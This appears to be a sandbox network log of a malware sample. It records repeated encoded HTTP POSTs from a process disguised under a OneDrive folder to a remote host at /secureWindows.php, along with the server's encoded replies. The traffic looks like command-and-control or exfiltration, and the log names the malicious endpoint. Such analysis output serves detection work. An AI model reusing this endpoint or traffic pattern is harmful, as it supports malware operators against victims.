                                                        Oct 30, 2024 05:22:12.952776909 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:13.261493921 CET792INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y4n2OG%2FQqFhwpISjsX2FOdEfSydPbELHyo4jc%2FkK%2FQbNeghsHdpyg3CejUPMS1IwKv1rP%2FTzCPPRZNAYh1yDlXOQHcTvgWxaNqOwcqwr%2FdD6y3pFQ1AT9NF3j4d%2FOo1bIRTetzp3UFo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f7a9f134790-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1203&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1235494&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449736188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:13.386506081 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:13.745790005 CET1076OUTData Raw: 57 51 5c 51 55 55 56 54 58 57 50 59 55 5a 5b 59 54 58 5c 5a 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\QUUVTXWPYUZ[YTX\ZYVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&82]<.\$.+96,Z&'8,#:7X&*+\+5$(9 F$,Z*-


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449737188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:13.800328970 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:14.151985884 CET1340OUTData Raw: 57 50 5c 5d 55 5a 56 50 58 57 50 59 55 5b 5b 5c 54 5d 5c 58 59 50 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\]UZVPXWPYU[[\T]\XYPZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[,"\?8]0=#A-]%=; 9$%_((C&385_:: F$,Z*)
                                                        Oct 30, 2024 05:22:14.394207001 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:14.702514887 CET937INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4y2tyEMN72yMGXpVG73ByXqn8XYDBTLHTZv8VZA87byrpWY%2FbvMOpKVrg1KIf9GMqTBzpxl0Qv6YgIVlV4MBjg90INIEKOU8Sx%2BtQtLXvZ5jKDCirVLwiNRXbqvgu%2FMklmtGBv%2BU9E%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f839fa63acf-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1195&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1232340&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 1d 3f 38 34 13 26 23 22 5d 28 12 3d 1d 29 00 26 14 25 22 3c 5d 25 12 00 1d 28 38 28 06 3e 24 0a 5b 3f 0b 38 12 34 0f 23 02 29 01 2f 46 0c 10 24 03 27 22 2b 53 3f 0d 2a 03 3d 38 01 59 23 20 31 04 2a 17 05 56 22 55 23 01 26 32 3d 0e 2c 3d 0b 0f 2d 0b 36 5f 2d 23 06 11 29 3a 21 57 08 14 22 10 32 02 3c 07 32 04 33 05 31 0c 2e 5b 34 06 33 5c 36 3b 3d 02 3f 05 38 1c 26 56 3b 07 30 33 33 1c 25 5f 33 02 3e 31 27 56 32 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&?84&#"](=)&%"<]%(8(>$[?84#)/F$'"+S?*=8Y# 1*V"U#&2=,=-6_-#):!W"2<231.[43\6;=?8&V;033%_3>1'V2"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.449738188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:13.974978924 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:14.323700905 CET1076OUTData Raw: 57 51 59 55 55 5e 56 50 58 57 50 59 55 5d 5b 59 54 5a 5c 54 59 55 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQYUU^VPXWPYU][YTZ\TYUZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,2](>Y'[':& _$>8; %*7]?%>';&: F$,Z*1
                                                        Oct 30, 2024 05:22:14.581960917 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:14.911711931 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVT5KYb%2F6u9Fv%2FMXQDID9Wb0pW6NxwWZ43kwLaDeHVLyX6yAD3B6zqYvc%2Btd30cZkUFyaMyOlE7btGp%2BUIXxLBxaY89pbru3sslJfTohurmMgyAV1TEGJD3YpOEWMtXwFmTVRYaQfmU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f84cb9d281b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1064705&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449740188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:15.049412012 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:15.401842117 CET1076OUTData Raw: 52 53 5c 51 50 5a 56 51 58 57 50 59 55 51 5b 5e 54 5a 5c 5b 59 53 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\QPZVQXWPYUQ[^TZ\[YSZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&- <$-/:C0\1.?,\+":10?C!['("/* F$,Z*
                                                        Oct 30, 2024 05:22:15.674638987 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:15.997582912 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0MHcCXtXgDOUEZs%2Babu3DiQGvPMJR5SvYtXzRJM00uoW54QLk6CG8gbBJ0jMT%2F2cYgv9zB5qkP0MhegXYnNXkZToTjFc8cTqMv5x4qMtQqzKYDpM9FxFaznS80kKf82y6rb7tJ6E%2B%2BY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f8b9a65e926-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1066&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1394990&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449742188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:16.125663042 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:16.479959011 CET1076OUTData Raw: 57 55 5c 53 50 5d 56 50 58 57 50 59 55 5d 5b 53 54 5d 5c 5a 59 5c 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WU\SP]VPXWPYU][ST]\ZY\Z^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%80-<(1'7A:Z%-//:+79$&_+6!\'.. F$,Z*1
                                                        Oct 30, 2024 05:22:16.728323936 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:17.038127899 CET784INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w4hIdFIFkm1Uc81oxpgcGninhH0ShXPA61vZajv8ycIuXBGWJEcQOG5bAK1R3%2Fl4yumGRB0DH4y1pX41qHAv6dniyQASQIjKDhV6gwcXr23E2qb06HPqPIxYt8W8j3z0LAxJ%2BsXmzdY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f923c2aeac1-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1013&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1302158&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449745188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:17.172498941 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:17.527048111 CET1076OUTData Raw: 52 53 5c 54 55 5d 53 52 58 57 50 59 55 5c 5b 58 54 5e 5c 5c 59 57 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\TU]SRXWPYU\[XT^\\YWZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&-31<'#-5 2$Z/; *;X%:7+%53("/* F$,Z*5
                                                        Oct 30, 2024 05:22:17.769099951 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:18.063199043 CET784INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ki8lcahr1WxmHWAB9I1sX3Puu70RhfcpVOort7HSgENDhJrYM3%2FWf383ReWrDHkb2fwy97pTETFLSTeSjm196PE4eVRPvme8ic%2FAWHW4erFaURyUqqEu9nq3JTZpLL3BTHFQoOTxjmg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f98bf484790-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1261&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1182040&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449746188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:18.352463961 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:18.698719025 CET1076OUTData Raw: 57 5e 5c 57 50 5f 53 51 58 57 50 59 55 5b 5b 5c 54 5e 5c 5d 59 51 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\WP_SQXWPYU[[\T^\]YQZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[-0:]?8!'[+E-571>/-9+7+19'<9Z'(: F$,Z*)
                                                        Oct 30, 2024 05:22:18.950525045 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:19.277766943 CET789INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pAM%2By61PjogznBFjXypGZYN2fJdz7BXaoY4KlYWX2kKZ5CFLHwE5ZzQ13DJMQStdkac4njS3jY7RvRtJEWM02%2BH%2Ftc8MU4hltGtARN7g%2Bh8Fif2FqVs7Z0UAOPM%2BduERenRhXO5UwEw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fa01a746be9-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=990&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1476044&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.449748188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:19.411257982 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.449749188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:19.721645117 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:20.073736906 CET1340OUTData Raw: 57 50 5c 51 55 5c 56 53 58 57 50 59 55 51 5b 5f 54 5a 5c 5b 59 54 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\QU\VSXWPYUQ[_TZ\[YTZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[- *_<Y0. 9/1<_/)4["982)7?!0%[9: F$,Z*
                                                        Oct 30, 2024 05:22:20.354216099 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:20.569827080 CET938INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ohWq%2BmEtAsmheXOhYLbXsJWqOFFl%2BgY1%2F3j1T9cuHt4JLNvvRsPctL%2FbnVVexMpwPSOsyxWMoPbWaDKPWiImYa79r9SItrahFr0pg0ooLmMndugwWDXFtxLkjXMoaeJsr%2Bcj7V5ktVg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fa8db884781-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=834101&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 25 0e 29 38 06 57 26 1d 2e 58 29 2c 2a 00 3e 00 07 07 25 21 2b 04 31 2c 31 03 2a 2b 27 5a 3d 42 34 5e 3c 21 24 1f 23 08 2c 1c 29 11 2f 46 0c 10 27 5b 27 0c 0a 0e 3f 0d 2e 05 3e 28 2c 01 23 1e 29 04 29 2a 2f 51 21 55 27 03 24 57 3a 53 3b 5b 32 52 39 1c 31 06 39 1d 0d 0c 29 10 21 57 08 14 21 01 25 3c 09 5f 31 3e 3c 59 26 0c 3d 01 23 3f 2f 10 22 5d 2e 10 28 38 3c 54 31 30 34 5a 26 20 28 0e 31 07 02 16 3c 57 2c 0f 25 09 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98%)8W&.X),*>%!+1,1*+'Z=B4^<!$#,)/F'['?.>(,#))*/Q!U'$W:S;[2R919)!W!%<_1><Y&=#?/"].(8<T104Z& (1<W,%"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.449751188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:19.846756935 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:20.198719978 CET1076OUTData Raw: 57 55 59 56 50 5e 53 57 58 57 50 59 55 59 5b 5b 54 52 5c 5d 59 52 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WUYVP^SWXWPYUY[[TR\]YRZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^,3&]?3[8:&,]$-0^,#<&97\+C*$89X:* F$,Z*!
                                                        Oct 30, 2024 05:22:20.442985058 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:20.755902052 CET783INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yS32MOLGCnAjL3k0DSj7gAcFXUbTjcXIbid9Z3yK5j6pAhwjJBoHVQUctczh3Hgg6lOW%2FJvPYKArcKSEIEXuP4N0UazzhuHMDsHCFPELk67DMqfdJyeszk9oLXxQvj75LX%2BTr6Qf7hI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89fa96a300c0f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1383&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1084644&cwnd=66&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.449752188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:22:20.890213966 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
